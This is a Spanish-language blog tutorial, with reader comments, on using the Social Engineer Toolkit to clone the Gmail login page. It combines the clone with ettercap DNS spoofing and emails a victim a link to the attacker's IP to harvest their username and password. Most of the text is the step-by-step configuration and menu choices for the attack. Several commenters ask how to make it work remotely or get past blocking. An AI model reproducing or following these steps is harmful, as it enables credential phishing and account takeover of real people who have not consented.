Phishing + robo de contraseñas con SET (Social Engineer Toolkit)

SET (Social Engineer Toolkit), se trata de un kit de herramientas especialmente diseñado para realizar ataques avanzados contra el elemento humano. Este conjunto de herramientas rápidamente se ha constituido en una herramienta estandard en el arsenal de los penetration testers.

Fué escrito por David Kennedy (Rel1K). Los ataques construidos con este toolkit son diseñados para ser lanzado contra una persona u organización durante un test de penetración. Forma parte del kit de herramientas de Backtrack.

Configuración:

pentest/exploits/SET#nano config/set_config

Nos fijamos que estén configuradas, al menos, las siguientes opciones:

METASPLOIT_PATH=/opt/metasploit3/msf3
ETTERCAP=ON
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
WEBATTACK_EMAIL=ON
AUTO_DETECT=ON
SELF_SIGNED_APPLET=ON

Ahora, ejecutamos SET:

pentest/exploits/SET# ./set

Se presenta el siguiente menú:

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Third Party Modules
9.  Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Escojemos la opción: 2

Despues de mostrarnos la descripción de cada una de las opciones, se muestran este menú:

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Escojemos la opción: 3

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4):

Escojemos la opción 2

En esta parte, tenemos que ingresar la página o sitio web que se va a clonar y falsear:

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone:

Aqui ponemos por ejemplo: https://gmail.com

La siguiente opción la seteamos la por default, dando un enter aqui:

Enter the site to redirect to attack machine (enter for default):

En la siguiente opción seteamos no:

Do you want to use bridged mode yes or no: no

Hasta aqui ya hemos lanzado un ataque de DNS_SPOOF con ettercap, como se muestra:

[*] LAUNCHING ETTERCAP DNS_SPOOF ATTACK!

….

Press {return} to continue.

Ahora, continua la parte de configuración  del correo para poder enviar el enlace hacia la página que hemos clonado:

Social Engineer Toolkit Mass E-Mailer

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Escojemos la opción 1

Enter who you want to send email to: [Ingresamos la dirección e-mail de la victima]

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

En mi caso, escojí la opción 1

Enter your choice: 1
Enter your GMAIL email address: [cuenta-atacante]@gmail.com
Enter your password for gmail (it will not be displayed back to you): [ingresar contraseña de la cuenta-atacante]
Enter the subject of the email: [El asunto del correo]

Enviar el mensaje en texto plano o como html:

Do you want to send the message as html or plain?

1. HTML
2. Plain

Escojemos la opción 2

Enter the body of the message, hit return for a new line.

Type your body and enter control+c when you are finished: mira el siguiente enlace: http://%5BIP-atacante%5D

y presionamos control+c

Ahora esperamos que la victima reciba el correo de click en el enlace que le hemos enviado, a partir de ahora se establece la conexión y se muestra la información de la siguiente manera:

 

contrasenias capturadas

contrasenias capturadas

Podemos observar el usuario y la contraseñe que la victima  ingreso en la página falsa que le enviamos.

Para finalizar este proceso, tecleamos control-c, y automaticamente se genera un reporte en el directorio resources.

 

    • Kevin
    • 13/05/11

    Hola, quisiera saber como configuras la IP atacante, he intentando hacerla pero me sale que la ip atacante es 0.0.0.0 y por lo tanto no hay como ingresar a esta, como configuro para que sea una IP valida?

    • Gris
    • 10/06/11

    @Kevin
    La IP atacante es la misma ip de tu maquina, si tu maquina tiene la 192.168.1.30, tienes que poner esa misma en el email que vas a enviar
    @César
    Se puede hacer remotamente? o solo en red local?

    un saludo

    • Tadeo
    • 18/09/11

    Hola una pregunta con el tipo de ataque:Mass Mailer Attack
    una vez que el usuario victima ya abrio el correo como vez los resultados? he visto videos pero nada mas se quedan hasta donde se abre el correo pero ya no mas, saludos y espero tu respuesta.

    • dany
    • 15/01/13

    que tal mira yo kiero hacer lo mismo con set pero me tira que esta blokeado ke puedo hacer en ese kaso urgente

  1. Asking questions are truly nice thing if you are not understanding
    anything completely, however this paragraph offers nice understanding yet.

    • angel
    • 22/07/13

    Una pregunta porque al momento de correr el set sale todo, pero no captura lo que se ha digitado desde la pagina clonada, es decir no se muestra el correo ni la contraseña, solo un aviso de que se ha ingresado a la pagina clonada

    • daniel961121
    • 17/09/15

    solo funciona en la red local? o remotamente ?

  1. 26/07/14
    Trackback from : cold coffee shop

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: